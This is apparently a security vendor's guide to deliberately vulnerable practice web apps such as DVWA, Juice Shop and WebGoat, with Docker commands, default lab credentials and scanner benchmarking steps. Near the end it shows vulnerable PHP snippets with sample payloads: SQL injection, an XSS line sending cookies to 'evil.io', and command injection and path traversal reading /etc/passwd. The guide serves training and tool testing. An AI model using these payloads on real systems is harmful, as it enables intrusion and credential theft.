Skip to main content

Free 30-min security demo  — We'll scan your real code and show live findings, no commitment Book Now

Offensive360
Application Security

Vulnerable Web Applications for Security Testing (2026)

Complete list of vulnerable websites for security testing: DVWA, OWASP Juice Shop, WebGoat, bWAPP & more — with Docker commands, scanner benchmarking guide & comparison table.

Offensive360 Security Research Team — min read
vulnerable web applications for security testing vulnerable web applications vulnerable web apps for testing vulnerable websites for testing intentionally vulnerable web applications DVWA OWASP Juice Shop WebGoat security testing practice web application security testing vulnerable web app vulnerable websites

Deliberately vulnerable web applications are the standard practice environment for web application security testing. Whether you’re a developer learning how injection attacks work, a security engineer benchmarking a SAST or DAST scanner, or a student preparing for a certification, vulnerable web applications provide a legal, isolated, resettable environment to practice offensive and defensive security techniques.

This guide covers every major vulnerable web application available for security testing in 2026 — what each one covers, who it’s for, and how to run it.


What Are Vulnerable Web Applications for Security Testing?

A vulnerable web application is a web application deliberately built with security flaws — SQL injection, XSS, command injection, path traversal, broken authentication, and other weaknesses from the OWASP Top 10 and beyond — so that security professionals and developers can practice finding and exploiting them legally.

Unlike real-world targets, these applications are:

  • Legal to attack — they exist specifically to be probed
  • Isolated — typically a Docker container running on your local machine or a private VM
  • Resettable — restart the container to restore the original vulnerable state
  • Educational — most include documentation explaining why each vulnerability exists and how to fix it

They serve three main use cases:

  1. Developer training — understanding how vulnerabilities work from an attacker’s perspective
  2. Security tool benchmarking — testing whether your SAST or DAST scanner detects known vulnerabilities before applying it to production code
  3. Certification practice — preparing for OSCP, CEH, eWPT, and other hands-on security certifications

The Complete List of Vulnerable Web Applications

DVWA — Damn Vulnerable Web Application

Language: PHP/MySQL
Best for: OWASP Top 10 fundamentals, PHP SAST benchmarking, beginners

DVWA is the most widely used deliberately vulnerable web application. Built in PHP with a MySQL backend, each vulnerability page comes in three difficulty levels (Low, Medium, High) with a code viewer showing exactly what makes the code vulnerable.

Vulnerabilities covered:

  • SQL Injection (including blind injection — boolean-based and time-based)
  • Command Injection
  • Cross-Site Scripting (Reflected and Stored)
  • CSRF
  • File Upload (unrestricted)
  • Local and Remote File Inclusion (LFI/RFI)
  • Brute Force
  • Insecure CAPTCHA
  • Weak Session IDs
docker run --rm -it -p 80:80 vulnerables/web-dvwa
# Open http://localhost/
# Credentials: admin / password
# Click "Create / Reset Database" before first login

Why DVWA matters for scanner testing: The Low difficulty level presents vulnerabilities with zero obfuscation — SQL injection in a raw $_GET parameter concatenated directly into a query. If your SAST scanner can’t find this, it won’t find more subtle patterns in production code. Medium and High difficulty levels test whether the scanner handles basic evasion techniques.


OWASP Juice Shop

Language: Node.js/Express + Angular
Best for: Realistic DAST testing, modern web app architecture, CTF-style challenges

Juice Shop is the most realistic vulnerable web application available — a modern single-page application that looks and behaves like a real e-commerce store. It has 100+ security challenges organized by difficulty, with a built-in scoreboard and hint system.

Vulnerabilities covered:

  • Injection (SQL, NoSQL, LDAP, log injection)
  • Broken Authentication and Session Management
  • Sensitive Data Exposure
  • XML External Entities (XXE)
  • Broken Access Control
  • Security Misconfiguration
  • XSS (Reflected, Stored, DOM-based)
  • Insecure Deserialization
  • JWT manipulation
  • OAuth flaws
  • Business logic vulnerabilities
docker run --rm -p 3000:3000 bkimminich/juice-shop
# Open http://localhost:3000/
# No initial login required — register to participate in challenges
# Visit /#/score-board to see all available challenges

Why Juice Shop matters for DAST testing: Juice Shop’s realistic architecture — authenticated endpoints, session management, REST API, file upload, admin interface — provides the most representative surface for DAST scanner testing among all open-source vulnerable applications.


WebGoat

Language: Java/Spring
Best for: Java developer training, Java SAST benchmarking, structured learning

WebGoat is OWASP’s Java-based security training platform. Each lesson explains a vulnerability category, walks through the attack, and requires the student to successfully exploit it before advancing. It’s more structured than DVWA.

Vulnerabilities covered:

  • SQL Injection (including order-by injection)
  • XSS
  • Insecure Deserialization (Java ObjectInputStream)
  • JWT attacks
  • Path Traversal
  • XXE
  • SSRF
  • Access Control failures
  • Cryptographic failures
docker run -it -p 8080:8080 -p 9090:9090 webgoat/webgoat
# Open http://localhost:8080/WebGoat
# Register a new account to start

Why WebGoat matters for Java SAST: WebGoat’s Spring-based source code contains the same vulnerability patterns found in enterprise Java applications — perfect for verifying that a SAST tool handles Spring MVC data binding, JDBC templates, and ORM-level injection correctly.


bWAPP — Buggy Web Application

Language: PHP
Best for: Maximum vulnerability breadth, advanced practitioners

bWAPP covers 100+ vulnerability types — more than any other single vulnerable application. It includes vulnerability classes beyond the OWASP Top 10 that most other apps don’t cover.

Coverage beyond OWASP Top 10:

  • SSRF (Server-Side Request Forgery)
  • XML injection and XXE
  • LDAP injection
  • SMTP injection
  • HTML5 security issues (localStorage, WebSocket attacks)
  • Heartbleed (simulated)
  • Shellshock (simulated)
  • iFrame injection
  • Client-side validation bypass
docker run -d -p 80:80 raesene/bwapp
# Open http://localhost/bWAPP/install.php
# Then http://localhost/bWAPP/login.php
# Credentials: bee / bug

NodeGoat

Language: Node.js/Express + MongoDB
Best for: Node.js SAST benchmarking, JavaScript-specific vulnerabilities

NodeGoat is OWASP’s deliberately vulnerable Node.js application. Unlike Juice Shop, it uses standard Express.js patterns — closer to what a typical Node.js backend API looks like in production.

Node.js/JavaScript-specific vulnerabilities:

  • NoSQL injection (MongoDB query operator injection)
  • Server-Side JavaScript injection (eval() misuse)
  • Prototype pollution
  • Insecure Express session configuration
  • Dependency vulnerabilities (intentionally outdated npm packages)
  • Missing HTTP security headers
git clone https://github.com/OWASP/NodeGoat
cd NodeGoat && npm install
docker-compose up
# Open http://localhost:4000/
# Default: admin / Admin_123

WebScarab NG / AltoroJ

Language: Java/JSP
Best for: Banking application simulation, enterprise DAST benchmarking

AltoroJ (also known as Altoro Mutual) is a vulnerable Java/JSP banking application used by IBM for security tool testing. Its banking context — account transfers, transaction history, user management — provides a more realistic business application surface than simple tutorial apps.

git clone https://github.com/AppSecDev/AltoroMutual
cd AltoroMutual && mvn package
java -jar target/altoromutual.war
# Open http://localhost:8080/
# Credentials: admin / admin

OWASP Mutillidae II

Language: PHP
Best for: OWASP Top 10 coverage, intermediate learners

Mutillidae II is a deliberately vulnerable PHP web application with over 40 vulnerability categories organized by the OWASP Top 10. It’s an alternative to DVWA with slightly more coverage of web services and REST API security.

docker run -d -p 80:80 -p 3306:3306 webpwnized/mutillidae
# Open http://localhost/

HackTheBox Web Challenges

Best for: Advanced practitioners, real-world vulnerability patterns, competitive training

HackTheBox offers a library of web application security challenges representing real CVE-style vulnerabilities in real frameworks — template injection, deserialization, race conditions, and chained attack scenarios.

Why it’s different from local vulnerable apps: HackTheBox challenges represent vulnerabilities found in actual production software — not toy examples. When you can consistently solve Medium and Hard HTB web challenges, you’re detecting the same vulnerability classes that appear in real security assessments.


PortSwigger Web Security Academy

Best for: Structured learning, free and browser-based, complete beginners to advanced

PortSwigger Web Security Academy is the most comprehensive free web security training platform. Labs run in the browser — no local setup required.

Advantages:

  • 200+ labs across all OWASP categories
  • Step-by-step explanations accompanying every lab
  • Covers advanced topics: HTTP smuggling, prototype pollution, GraphQL injection, web cache poisoning
  • Completely free — no subscription required

Limitation: Labs are browser-based and can’t be used for local SAST/DAST scanner benchmarking.


Choosing the Right Vulnerable Application for Your Goal

GoalBest Application
Complete beginnerDVWA (Low difficulty)
PHP SAST benchmarkingDVWA
Java SAST benchmarkingWebGoat
Node.js SAST benchmarkingNodeGoat
Realistic DAST testingOWASP Juice Shop
Enterprise DAST benchmarkingAltoroJ
Maximum vulnerability breadthbWAPP
Modern attack patterns (SSTI, deserialization)HackTheBox
Free browser-based learningPortSwigger Web Security Academy
Full attack chain practice (OSCP prep)VulnHub VMs
CTF challenges with scoreboardOWASP Juice Shop

For most security teams, the right answer is running two or three of these simultaneously:

  1. DVWA or Juice Shop for DAST scanner benchmarking
  2. WebGoat or NodeGoat for language-matched SAST benchmarking
  3. PortSwigger Academy for structured learning without local infrastructure

How to Use Vulnerable Web Applications to Test Your Security Scanner

Before deploying a SAST or DAST tool on your production codebase, benchmark it against a known-vulnerable application first. This tells you what the tool actually finds versus what it claims to find.

SAST Benchmarking Procedure

  1. Clone the source code of DVWA, WebGoat, or NodeGoat from GitHub
  2. Point your SAST scanner at the source code directory
  3. Verify it flags the known-vulnerable functions:
    • SQL injection in DVWA’s vulnerabilities/sqli/source/low.php
    • Command injection in DVWA’s vulnerabilities/exec/source/low.php
    • XSS in DVWA’s vulnerabilities/xss_r/source/low.php
  4. Check whether the scanner also catches Medium and High difficulty levels (slightly obfuscated patterns)
  5. Measure false positives — does it flag the High-difficulty pages that use safe parameterized queries?

A scanner that misses obvious SQL injection in low.php will miss similar patterns in your production code.

DAST Benchmarking Procedure

  1. Run Juice Shop or DVWA in Docker locally
  2. Configure your DAST scanner with authentication credentials for the application
  3. Run a full authenticated scan
  4. Verify the scanner finds XSS, SQLi, and access control issues
  5. Check false positive rate on known-clean endpoints

Most Common Vulnerabilities Found in Real Applications

The vulnerability classes in these practice applications match exactly what’s found in production enterprise code:

SQL Injection (CWE-89)

// DVWA low.php — completely unobfuscated SQL injection
$id = $_GET['id'];
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
// Input: 1' OR '1'='1 returns all users

Cross-Site Scripting (CWE-79)

// Reflected XSS — user input rendered without encoding
echo "<pre>Hello " . $_GET['name'] . "</pre>";
// Input: <script>document.location='https://evil.io?c='+document.cookie</script>

Command Injection (CWE-78)

// Command injection — user input in a shell command
$target = $_REQUEST['ip'];
$cmd = shell_exec('ping -c 4 ' . $target);
// Input: 127.0.0.1; cat /etc/passwd

Path Traversal (CWE-22)

// Path traversal — user controls the filename
$file = $_GET['page'];
include('/var/www/html/dvwa/vulnerabilities/fi/' . $file);
// Input: ../../../../etc/passwd

Frequently Asked Questions

Yes — provided you run them in your own isolated environment (a local Docker container or private VM). These applications are explicitly built to be attacked. Never probe a vulnerable application running on a shared or public server without explicit authorization from the server owner.

Which vulnerable web application is best for a complete beginner?

Start with DVWA at Low difficulty. Its source code viewer shows exactly what makes each page vulnerable. Work through all categories at Low, then Medium, before moving to Juice Shop for a more realistic challenge.

Can I use these apps to practice for the OSCP exam?

Vulnerable web applications are useful supplementary OSCP practice for web exploitation modules. OSCP focuses primarily on network exploitation, privilege escalation, and Active Directory. For dedicated web security certifications (eWPT, GWAPT, Web+), PortSwigger Web Security Academy and HackTheBox web challenges are more targeted preparation.

Do I need a powerful computer to run these applications?

Most Docker-based vulnerable applications run comfortably on any machine with 4 GB of RAM. Juice Shop uses the most resources (Node.js SPA with a full backend). DVWA and bWAPP are very lightweight. AltoroJ requires a JVM but no significant compute.


Benchmark Your Scanner Against Known Vulnerabilities

Offensive360 SAST and DAST are benchmarked against DVWA, Juice Shop, and WebGoat on every release. Want to see how your current scanner compares — or how Offensive360 performs on your own codebase?

Offensive360 Security Research Team

Application Security Research

Find vulnerabilities before attackers do

Run Offensive360 SAST and DAST against your applications and get a full vulnerability report in minutes.